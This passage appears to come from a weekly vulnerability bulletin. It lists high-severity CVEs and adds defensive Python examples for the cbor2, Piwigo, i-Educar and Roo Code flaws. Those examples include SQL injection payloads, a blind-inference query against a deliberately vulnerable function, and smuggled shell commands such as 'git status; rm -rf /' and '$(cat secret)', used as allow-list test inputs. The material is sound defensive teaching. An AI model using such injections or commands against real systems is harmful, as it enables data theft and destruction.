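        cut = len(buf) - incomplete_tail_len(buf)
        pieces.append(buf[:cut].decode("utf-8"))
        carry = buf[cut:]             # reset every round: carry only the cut tail, never the buffer
    if carry:
        raise ValueError("string ends inside a multi-byte character")
    return "".join(pieces)


def is_truncated(data: bytes) -> bool:
    """True when the declared length exceeds the bytes actually present."""
    try:
        decode_text_string(data)
    except EOFError:
        return True
    return False


if __name__ == "__main__":
    vec = boundary_vector()
    print(len(vec), "bytes; header", vec[:5].hex(), "; tail", repr(decode_text_string(vec)[-5:]))
```

`boundary_vector()` is also a convenient probe for a deployed build: feed the bytes to the installed cbor2's `loads()`; a correct decoder returns the 65540-character string, while the behaviour the advisory describes for the pre-5.7.1 C extension on this input shape is a CBORDecodeEOF error or runaway memory use.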
| Narkom Communication and Software Technologies Trade Ltd. Co.--Pyxis Signage | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Narkom Communication and Software Technologies Trade Ltd. Co. Pyxis Signage allows Stored XSS. This issue affects Pyxis Signage: through 31012025. | 2025-11-20 | 7.2 | CVE-2025-0643 | https://www.usom.gov.tr/bildirim/tr-25-0404   |
| Narkom Communication and Software Technologies Trade Ltd. Co.--Pyxis Signage | Unrestricted Upload of File with Dangerous Type vulnerability in Narkom Communication and Software Technologies Trade Ltd. Co. Pyxis Signage allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Pyxis Signage: through 31012025. | 2025-11-20 | 7.2 | CVE-2025-0645 | https://www.usom.gov.tr/bildirim/tr-25-0404   |
| nazsabuz--WP Dropzone | The WP Dropzone plugin for WordPress is vulnerable to authenticated arbitrary file upload in all versions up to, and including, 1.1.0 via the `ajax_upload_handle` function. This is due to the chunked upload functionality writing files directly to the uploads directory before any file type validation occurs. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-18 | 8.8 | CVE-2025-12775 | https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7aeb7-2c6f-4b23-b8b1-52fb010e5aac?source=cve https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L88 https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L127 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395966%40wp-dropzone&new=3395966%40wp-dropzone&sfp_email=&sfph_mail=   |
| Nettec AS--Digi On-Prem Manager | An injection vulnerability has been discovered in the API feature in Digi On-Prem Manager, enabling an attacker with valid API tokens to inject SQL via crafted input. The API is not enabled by default, and a valid API token is required to perform the attack. | 2025-11-17 | 8.8 | CVE-2025-13319 | https://dom.nettec.no/security-advisories/DOM-25-001/   |
| nmedia--Simple User Registration | The Simple User Registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpr_admin_msg' parameter in all versions up to, and including, 6.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 7.2 | CVE-2025-12160 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9bb5e60d-f7c9-4b47-ba6f-0f2d1d060263?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396064%40wp-registration&new=3396064%40wp-registration&sfp_email=&sfph_mail=   |
| nootheme--Realty Portal | The Realty Portal plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'rp_save_property_settings' function in versions 0.1 to 0.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. | 2025-11-21 | 8.8 | CVE-2025-11985 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e8263908-95b3-4b72-a9de-a982618eba2c?source=cve https://plugins.trac.wordpress.org/browser/realty-portal/tags/0.1/includes/property/process/ajax-save-property-setting.php#L189 https://plugins.trac.wordpress.org/browser/realty-portal/tags/0.1/includes/property/process/ajax-save-property-setting.php#L198 https://plugins.trac.wordpress.org/browser/realty-portal/tags/0.1/includes/functions/enqueue.php#L224 https://cwe.mitre.org/data/definitions/862.html https://developer.wordpress.org/reference/functions/current_user_can/   |
| NVIDIA--NVIDIA Isaac-GR00T N1.5 | NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component, where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2025-11-18 | 7.8 | CVE-2025-33183 | https://nvd.nist.gov/vuln/detail/CVE-2025-33183 https://www.cve.org/CVERecord?id=CVE-2025-33183 https://nvidia.custhelp.com/app/answers/detail/a_id/5725   |
| NVIDIA--NVIDIA Isaac-GR00T N1.5 | NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component, where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2025-11-18 | 7.8 | CVE-2025-33184 | https://nvd.nist.gov/vuln/detail/CVE-2025-33184 https://www.cve.org/CVERecord?id=CVE-2025-33184 https://nvidia.custhelp.com/app/answers/detail/a_id/5725   |
| oc3dots--S2B AI Assistant ChatBot, ChatGPT, OpenAI, Content & Image Generator | The S2B AI Assistant - ChatBot, ChatGPT, OpenAI, Content & Image Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeFile() function in all versions up to, and including, 1.7.8. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-21 | 7.2 | CVE-2025-12973 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac9d2b64-aff6-418a-bfe7-ec91b177ad6b?source=cve https://plugins.trac.wordpress.org/browser/s2b-ai-assistant/trunk/lib/helpers/Utils.php https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399267%40s2b-ai-assistant&new=3399267%40s2b-ai-assistant&sfp_email=&sfph_mail= https://github.com/d0n601/CVE-2025-12973 https://ryankozak.com/posts/cve-2025-12973/   |
| OpenStack--Keystone | OpenStack Keystone before 26.0.1, 27.0.0, and 28.0.0 allows a /v3/ec2tokens or /v3/s3tokens request with a valid AWS Signature to provide Keystone authorization. | 2025-11-17 | 7.5 | CVE-2025-65073 | https://www.openwall.com/lists/oss-security/2025/11/04/2   |
| Piwigo--Piwigo | Piwigo is a full featured open source photo gallery application for the web. In Piwigo 15.6.0, using the password reset function allows sending a password-reset URL by entering an existing username or email address. However, the hostname used to construct this URL is taken from the HTTP request's Host header and is not validated at all. Therefore, an attacker can send a password-reset URL with a modified hostname to an existing user whose username or email the attacker knows or guesses. This issue has been patched in version 15.7.0. | 2025-11-18 | 8.1 | CVE-2025-62406 | https://github.com/Piwigo/Piwigo/security/advisories/GHSA-9986-w7jf-33f6 https://github.com/Piwigo/Piwigo/commit/9d2565465efc3570963ff431b45cad21610f6692   |
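For the Piwigo row (CVE-2025-62406) the fix pattern is to build the e-mailed link from the configured site URL and to treat the Host header as untrusted input. The following is an added example, not Piwigo's code (the actual patch is commit 9d2565465efc3570963ff431b45cad21610f6692, linked in the row): the trusted host list, the /password.php path and the access-log lines are constructed assumptions. The log scan at the end shows how to find reset requests that arrived with an unexpected Host, which is the trace a link-poisoning attempt leaves.

```python
"""Password-reset link construction that does not trust the Host header.
Added example, not Piwigo's code. TRUSTED_HOSTS, CANONICAL_HOST, RESET_PATH and the
log lines are constructed for illustration."""
import re

TRUSTED_HOSTS = {"gallery.example.org"}   # assumed: the site's configured canonical host(s)
CANONICAL_HOST = "gallery.example.org"    # assumed: what the configured site URL points at
RESET_PATH = "/password.php"              # assumed path, used only to shape the URL


def normalize_host(host: str) -> str:
    """Lower-case and strip an optional port, keeping IPv6 literals intact."""
    host = host.strip().lower()
    if host.startswith("["):                       # [::1]:8080 -> [::1]
        return host.split("]", 1)[0] + "]"
    if host.count(":") == 1:                       # example.org:443 -> example.org
        return host.rsplit(":", 1)[0]
    return host


def is_trusted_host(request_host: str) -> bool:
    return normalize_host(request_host) in TRUSTED_HOSTS


def reset_url_vulnerable(request_host: str, key: str) -> str:
    """The flawed shape: whatever the client sent as Host lands in the e-mailed link."""
    return f"https://{request_host}{RESET_PATH}?key={key}"


def reset_url(request_host: str, key: str) -> str:
    """Hardened: refuse unknown hosts, and always emit the configured canonical host."""
    if not is_trusted_host(request_host):
        raise ValueError("Host header not in the configured allow-list")
    return f"https://{CANONICAL_HOST}{RESET_PATH}?key={key}"


# Constructed access-log lines: host, method, path, status. A real server needs the Host
# header added to its log format (Apache: %{Host}i) before this check has anything to read.
SAMPLE_LOG = """\
gallery.example.org POST /password.php 200
attacker.example POST /password.php 200
gallery.example.org:443 POST /password.php 200
attacker.example GET /index.php 200
"""
LOG_RE = re.compile(r"^(?P<host>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d+)$")


def suspicious_reset_requests(log_text: str) -> list[str]:
    """Host values that reached the reset endpoint without being a trusted host."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["path"] != RESET_PATH:
            continue
        if not is_trusted_host(m["host"]):
            hits.append(m["host"])
    return hits


if __name__ == "__main__":
    print("vulnerable:", reset_url_vulnerable("attacker.example", "k1"))
    print("hardened:  ", reset_url("gallery.example.org:443", "k1"))
    print("suspicious:", suspicious_reset_requests(SAMPLE_LOG))
```

Normalizing before the allow-list comparison matters: case, an explicit port and IPv6 bracket syntax are all legitimate ways the same host can appear, while a host that merely starts with the trusted name (for example a longer attacker-controlled domain) must still fail.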
| portabilis--i-educar | i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/agenda.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_agenda request parameter, which is directly concatenated into multiple SQL queries without proper sanitization. This issue has been patched in commit b473f92. | 2025-11-19 | 7.2 | CVE-2025-65022 | https://github.com/portabilis/i-educar/security/advisories/GHSA-4hrj-5gwx-r4w4 https://github.com/portabilis/i-educar/commit/b473f92b5326f45d7bce2de93a5381bed7ca8ac7   |
| portabilis--i-educar | i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/funcionario_vinculo_cad.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_funcionario_vinculo GET parameter, which is directly concatenated into an SQL query without proper sanitization. This issue has been patched in commit a00dfa3. | 2025-11-19 | 7.2 | CVE-2025-65023 | https://github.com/portabilis/i-educar/security/advisories/GHSA-8rv6-x8h9-fjfc https://github.com/portabilis/i-educar/commit/a00dfa3f129bc84e27873aa01cbd3f82e5b6c6c8   |
| portabilis--i-educar | i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/agenda_admin_cad.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_agenda GET parameter, which is directly concatenated into an SQL query without proper sanitization. This issue has been patched in commit 3e9763a. | 2025-11-19 | 7.2 | CVE-2025-65024 | https://github.com/portabilis/i-educar/security/advisories/GHSA-6c8p-xqcv-rghx https://github.com/portabilis/i-educar/commit/3e9763a561b328edaed21a7dc2e0dba0bbbc6e22   |
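The three i-Educar rows (CVE-2025-65022, -65023 and -65024) describe the same defect in three scripts: a request parameter concatenated straight into SQL text. The following is an added example, not i-Educar's code (the real fixes are the commits linked in each row). It uses SQLite so it runs offline; the agenda table and its rows are constructed. Because SQLite has no sleep(), the injection is demonstrated with boolean payloads rather than the time-based ones the advisories mention, but the injection point and the inference an attacker performs are the same.

```python
"""String-built query beside its parameterized form (added example, not i-Educar's code).
SQLite is used so this runs offline; the table, rows and column names are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed fixture standing in for an agenda table keyed by cod_agenda."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE agenda (cod_agenda INTEGER PRIMARY KEY, titulo TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO agenda VALUES (?, ?, ?)",
        [(1, "Reuniao", "ana"), (2, "Prova", "bruno"), (3, "Conselho", "carla")],
    )
    return conn


def fetch_agenda_vulnerable(conn: sqlite3.Connection, cod_agenda: str) -> list[tuple]:
    """The flawed shape: the request parameter is concatenated into the SQL text."""
    sql = "SELECT cod_agenda, titulo FROM agenda WHERE cod_agenda = " + cod_agenda
    return conn.execute(sql).fetchall()


def fetch_agenda(conn: sqlite3.Connection, cod_agenda: str) -> list[tuple]:
    """Hardened: enforce the integer type at the trust boundary, then bind the value."""
    try:
        code = int(cod_agenda)
    except ValueError:
        raise ValueError("cod_agenda must be an integer") from None
    return conn.execute(
        "SELECT cod_agenda, titulo FROM agenda WHERE cod_agenda = ?", (code,)
    ).fetchall()


def rejects(conn: sqlite3.Connection, cod_agenda: str) -> bool:
    """True when the hardened query refuses the input instead of executing it."""
    try:
        fetch_agenda(conn, cod_agenda)
    except ValueError:
        return True
    return False


def blind_infer_row_count(conn: sqlite3.Connection, guess: int) -> bool:
    """Blind inference through the vulnerable query: does the table hold more than `guess` rows?
    A time-based attacker asks the same yes/no question with a delay instead of a returned row."""
    payload = f"2 AND (SELECT COUNT(*) FROM agenda) > {guess}"
    return len(fetch_agenda_vulnerable(conn, payload)) == 1


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, payload '2 OR 1=1':", fetch_agenda_vulnerable(conn, "2 OR 1=1"))
    print("hardened rejects it:", rejects(conn, "2 OR 1=1"))
```

The type check before binding is not a substitute for the placeholder; it is there so that a malformed value is rejected with a clear error at the boundary rather than silently turned into a query for `cod_agenda = 0`.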
| premmerce--Premmerce Wholesale Pricing for WooCommerce | The Premmerce Wholesale Pricing for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'ID' parameter in versions up to, and including, 1.1.10. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber level access and above, to manipulate SQL queries that can be used to extract sensitive information from the database and modify price type display names in the database via the admin-post.php "premmerce_update_price_type" action, causing cosmetic corruption of the admin interface. The 'price_type' parameter of the "premmerce_delete_price_type" is also vulnerable. | 2025-11-18 | 7.1 | CVE-2025-12411 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e27e0-bbb0-498a-b425-9e9d60dfed0f?source=cve https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-wholesale-pricing/tags/1.1.10/src/Models/Model.php#L171 https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-wholesale-pricing/tags/1.1.10/src/Admin/Admin.php#L83   |
| projectworlds--Advanced Library Management System | A vulnerability was identified in projectworlds Advanced Library Management System 1.0. This affects an unknown part of the file /delete_admin.php. The manipulation of the argument admin_id leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-11-23 | 7.3 | CVE-2025-13572 | VDB-333336; projectworlds Advanced Library Management System delete_admin.php sql injection VDB-333336; CTI Indicators (IOB, IOC, TTP, IOA) Submit #698645; projectworlds Advanced Library Management System V1.0 SQL Injection https://github.com/GYSakura/tmp/blob/main/report.md |
| rajeshsingh520--Live sales notification for WooCommerce | The Live sales notification for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.3.39. This is due to the "getOrders" function lacking proper authorization and capability checks when the plugin is configured to display recent order information. This makes it possible for unauthenticated attackers to extract sensitive customer information including buyer first names, city, state, country, purchase time and date, and product details. | 2025-11-18 | 7.5 | CVE-2025-12955 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1cebcf16-ae7f-45c4-8e1d-80ede4c32106?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394241%40live-sales-notifications-for-woocommerce&old=3389540%40live-sales-notifications-for-woocommerce&sfp_email=&sfph_mail=   |
| Ribose--RNP | In RNP version 0.18.0 a refactoring regression causes the symmetric session key used for Public-Key Encrypted Session Key (PKESK) packets to be left uninitialized except for zeroing, resulting in it always being an all-zero byte array. Any data encrypted using public-key encryption in this release can be decrypted trivially by supplying an all-zero session key, fully compromising confidentiality. The vulnerability affects only public key encryption (PKESK packets).  Passphrase-based encryption (SKESK packets) is not affected. Root cause: Vulnerable session key buffer used in PKESK packet generation. The defect was introduced in commit `7bd9a8dc356aae756b40755be76d36205b6b161a` where initialization logic inside `encrypted_build_skesk()` only randomized the key for the SKESK path and omitted it for the PKESK path. | 2025-11-21 | 7.5 | CVE-2025-13470 | Introducing commit Ubuntu package Arch Linux AUR package Bugzilla report (may become public) https://bugzilla.redhat.com/show_bug.cgi?id=2415863 https://access.redhat.com/security/cve/cve-2025-13402 https://open.ribose.com/advisories/ra-2025-11-20/ https://github.com/rnpgp/rnp/releases/tag/v0.18.1   |
| RooCodeInc--Roo-Code | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Prior to version 3.26.7, due to an error in validation, it was possible for Roo to automatically execute commands that did not match the allow-list prefixes. This issue has been patched in version 3.26.7. | 2025-11-21 | 8.1 | CVE-2025-65946 | https://github.com/RooCodeInc/Roo-Code/security/advisories/GHSA-hwm7-w97p-4h8p https://github.com/RooCodeInc/Roo-Code/pull/7667 https://github.com/RooCodeInc/Roo-Code/commit/b50104cc5987ce64f5154309d967ae8c74cfd1f3   |
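The Roo Code row (CVE-2025-65946) names the failure class (auto-executed commands that did not match the allow-list prefixes) without saying which validation step was wrong, so the example below does not reconstruct that bug. It is an added Python illustration, not Roo Code's code, of what a prefix allow-list for auto-executed shell commands has to check: tokenize the way a shell would, refuse chaining, redirection and substitution, and compare whole tokens rather than string prefixes. The allow-list entries are assumed.

```python
"""Token-wise command allow-list check. Added example; not Roo Code's code and not a
reconstruction of its bug. ALLOWED_PREFIXES is an assumed allow-list."""
import shlex

ALLOWED_PREFIXES = ["git status", "git diff", "npm test", "ls"]   # assumed allow-list
OPERATOR_CHARS = set(";&|<>()`$")   # chaining, redirection, grouping and substitution


def tokenize(command: str) -> list[str]:
    """Split like a POSIX shell, emitting operators such as ';' and '&&' as their own tokens."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def startswith_allowed_naive(command: str) -> bool:
    """The pitfall: plain string prefix matching. An 'ls' entry lets 'lsof' through."""
    return any(command.startswith(p) for p in ALLOWED_PREFIXES)


def is_allowed(command: str) -> bool:
    """Accept only a single simple command whose leading tokens equal an allowed prefix."""
    if "\n" in command or "\r" in command:
        return False                              # line breaks separate commands; shlex sees whitespace
    try:
        tokens = tokenize(command)
    except ValueError:                            # unbalanced quotes: do not guess, refuse
        return False
    if not tokens:
        return False
    for tok in tokens:
        if set(tok) & OPERATOR_CHARS:
            return False                          # also rejects quoted operators, deliberately
    for prefix in ALLOWED_PREFIXES:
        want = prefix.split()
        if tokens[: len(want)] == want:           # whole-token comparison, not str.startswith
            return True
    return False


if __name__ == "__main__":
    for cmd in ["git status --short", "lsof -i", "git status; rm -rf /", "git diff $(cat secret)"]:
        print(f"{cmd!r:32} naive={startswith_allowed_naive(cmd)!s:5} token-wise={is_allowed(cmd)}")
```

Rejecting any token that contains an operator character is intentionally conservative: an argument such as `"a;b"` is harmless to the shell once quoted, but an allow-list that auto-executes is the wrong place to reason about which quoted operators are safe.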
| SEIKO EPSON CORPORATION--EPSON WebConfig for SEIKO EPSON Projector Products | EPSON WebConfig and Epson Web Control for SEIKO EPSON Projector Products do not restrict excessive authentication attempts. An administrative user's password may be identified through a brute force attack. | 2025-11-21 | 9.8 | CVE-2025-64310 | https://www.epson.jp/support/misc_t/251120_oshirase.htm https://jvn.jp/en/vu/JVNVU95021911/   |
| Siemens--PS/IGES Parasolid Translator Component | A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions < V29.0.258). The affected application contains an out-of-bounds read vulnerability while parsing specially crafted IGS files. This could allow an attacker to crash the application or execute code in the context of the current process. (ZDI-CAN-26755) | 2025-11-17 | 7.8 | CVE-2025-40936 | https://cert-portal.siemens.com/productcert/html/ssa-241605.html   |
| simonhaenisch--md-to-pdf | md-to-pdf is a CLI tool for converting Markdown files to PDF using Node.js and headless Chrome. Prior to version 5.2.5, a Markdown front-matter block that contains a JavaScript delimiter causes the JS engine in the gray-matter library to execute arbitrary code in the Markdown-to-PDF converter process of the md-to-pdf library, resulting in remote code execution. This issue has been patched in version 5.2.5. | 2025-11-21 | 10 | CVE-2025-65108 | https://github.com/simonhaenisch/md-to-pdf/security/advisories/GHSA-547r-qmjm-8hvw https://github.com/simonhaenisch/md-to-pdf/commit/46bdcf2051c8d1758b391c1353185a179a47a4d9   |
| smackcoders--WP Import Ultimate CSV XML Importer for WordPress | The WP Import - Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 7.33.1. This is due to deserialization of untrusted data supplied via CSV file imports in the import_single_post_as_csv function within SingleImportExport.php. This makes it possible for authenticated attackers, with administrator-level access or higher, to inject a PHP object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2025-11-19 | 7.2 | CVE-2025-13145 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5e441699-4c78-4277-8ac1-f33b810e78cb?source=cve https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/trunk/SingleImportExport.php#L116 https://plugins.trac.wordpress.org/changeset/3397842/wp-ultimate-csv-importer/trunk/SingleImportExport.php   |
| SMCI--MBD-X13SEDW-F | There is a vulnerability in the Supermicro BMC web function at Supermicro MBD-X13SEDW-F. After logging into the BMC Web server, an attacker can use a specially crafted payload to trigger the Stack buffer overflow vulnerability. | 2025-11-18 | 7.2 | CVE-2025-8076 | https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025   |
| SMCI--X13SEDW-F | There is a vulnerability in the Supermicro BMC web function at Supermicro MBD-X13SEDW-F. After logging into the BMC Web server, an attacker can use a specially crafted payload to trigger the Stack buffer overflow vulnerability. | 2025-11-18 | 7.2 | CVE-2025-8727 | https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025   |
| smub--Giveaways and Contests by RafflePress Get More Website Traffic, Email Subscribers, and Social Followers | The Giveaways and Contests by RafflePress - Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple social media username parameters in all versions up to, and including, 1.12.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 7.2 | CVE-2025-12484 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7cda6aad-36e1-45c7-af46-a7b90bb2d339?source=cve https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L539 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L543 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L547 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L551 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L555 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L559 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L563 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/entry.php#L110 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3398188%40rafflepress&old=3346436%40rafflepress&sfp_email=&sfph_mail=   |
| SolarWinds--Serv-U | A logic error vulnerability exists in Serv-U which when abused could give a malicious actor with access to admin privileges the ability to execute code. This issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default. | 2025-11-18 | 9.1 | CVE-2025-40547 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40547 https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm   |
| SolarWinds--Serv-U | A missing validation process exists in Serv-U which, when abused, could give a malicious actor with access to admin privileges the ability to execute code. This issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default. | 2025-11-18 | 9.1 | CVE-2025-40548 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40548 https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm   |
| SolarWinds--Serv-U | A Path Restriction Bypass vulnerability exists in Serv-U that when abused, could give a malicious actor with access to admin privileges the ability to execute code on a directory. This issue requires administrative privileges to abuse. On Windows systems, this scored as medium due to differences in how paths and home directories are handled. | 2025-11-18 | 9.1 | CVE-2025-40549 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40549 https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm   |
| SourceCodester--Company Website CMS | A vulnerability was found in SourceCodester Company Website CMS 1.0. This affects an unknown part of the file /admin/reset-password.php. The manipulation of the argument email results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-11-23 | 7.3 | CVE-2025-13560 | VDB-333325; SourceCodester Company Website CMS reset-password.php sql injection VDB-333325; CTI Indicators (IOB, IOC, TTP, IOA) Submit #696637; sourcecodester Company Website CMS V1.0 SQL Injection https://github.com/miwangdemaoxianzhe/CVE/issues/1 https://www.sourcecodester.com/ |
| SourceCodester--Company Website CMS | A vulnerability was determined in SourceCodester Company Website CMS 1.0. This vulnerability affects unknown code of the file /admin/index.php. This manipulation of the argument Username causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-11-23 | 7.3 | CVE-2025-13561 | VDB-333326; SourceCodester Company Website CMS index.php sql injection VDB-333326; CTI Indicators (IOB, IOC, TTP, IOA) Submit #696684; sourcecodester Company Website CMS V1.0 SQL Injection https://github.com/miwangdemaoxianzhe/CVE/issues/2 https://www.sourcecodester.com/ |
| SourceCodester--Online Shop Project | A vulnerability was identified in SourceCodester Online Shop Project 1.0. The affected element is an unknown function of the file /action.php. Such manipulation of the argument Search leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-11-20 | 7.3 | CVE-2025-13451 | VDB-333021; SourceCodester Online Shop Project action.php sql injection VDB-333021; CTI Indicators (IOB, IOC, TTP, IOA) Submit #694674; SourceCodester Online Shop Project V1.0 SQL Injection https://github.com/xiaojuzirr/cve/issues/4 https://www.sourcecodester.com/ |
| SourceCodester--Train Station Ticketing System | A weakness has been identified in SourceCodester Train Station Ticketing System 1.0. Affected by this vulnerability is an unknown functionality of the file /ajax.php?action=login. This manipulation of the argument Username causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-11-18 | 7.3 | CVE-2025-13344 | VDB-332762 | SourceCodester Train Station Ticketing System ajax.php sql injection VDB-332762 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691940 | SourceCodester Train Station Ticketing System V1.0 SQL Injection https://github.com/puppytgyh/-CVE/issues/14 https://www.sourcecodester.com/   |
| stellarwp--GiveWP Donation Plugin and Fundraising Platform | The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 4.13.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Avatars must be enabled in the WordPress install in order to exploit the vulnerability. | 2025-11-19 | 7.2 | CVE-2025-13206 | https://www.wordfence.com/threat-intel/vulnerabilities/id/95823720-e1dc-46c1-887b-ffd877b2fbe5?source=cve https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/templates/shortcode-donor-wall.php#L59 https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/includes/process-donation.php#L1230 https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/includes/class-give-donor.php#L1135 https://plugins.trac.wordpress.org/changeset/3398128/   |
| Tenda--AC20 | A vulnerability was detected in Tenda AC20 up to 16.03.08.12. The impacted element is an unknown function of the file /goform/WifiExtraSet. The manipulation of the argument wpapsk_crypto results in buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. | 2025-11-17 | 8.8 | CVE-2025-13258 | VDB-332593 \| Tenda AC20 WifiExtraSet buffer overflow VDB-332593 \| CTI Indicators (IOB, IOC, IOA) Submit #688716 \| Tenda AC20 Router Affected firmware version: <= V16.03.08.12 Buffer Overflow https://github.com/DavCloudz/cve/blob/main/Tenda/Tengda%20AC20%20Router%20WifiExtraSet%20Buffer%20Overflow%20Vulnerability.md https://github.com/DavCloudz/cve/blob/main/Tenda/Tengda%20AC20%20Router%20WifiExtraSet%20Buffer%20Overflow%20Vulnerability.md#poc https://www.tenda.com.cn/   |
| Tenda--AC21 | A flaw has been found in Tenda AC21 16.03.08.16. This affects an unknown part of the file /goform/SetIpMacBind. Executing manipulation of the argument list can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been published and may be used. | 2025-11-20 | 8.8 | CVE-2025-13445 | VDB-333017 \| Tenda AC21 SetIpMacBind stack-based overflow VDB-333017 \| CTI Indicators (IOB, IOC, IOA) Submit #694066 \| Tenda AC21 V16.03.08.16 Buffer Overflow https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN7.md https://www.tenda.com.cn/   |
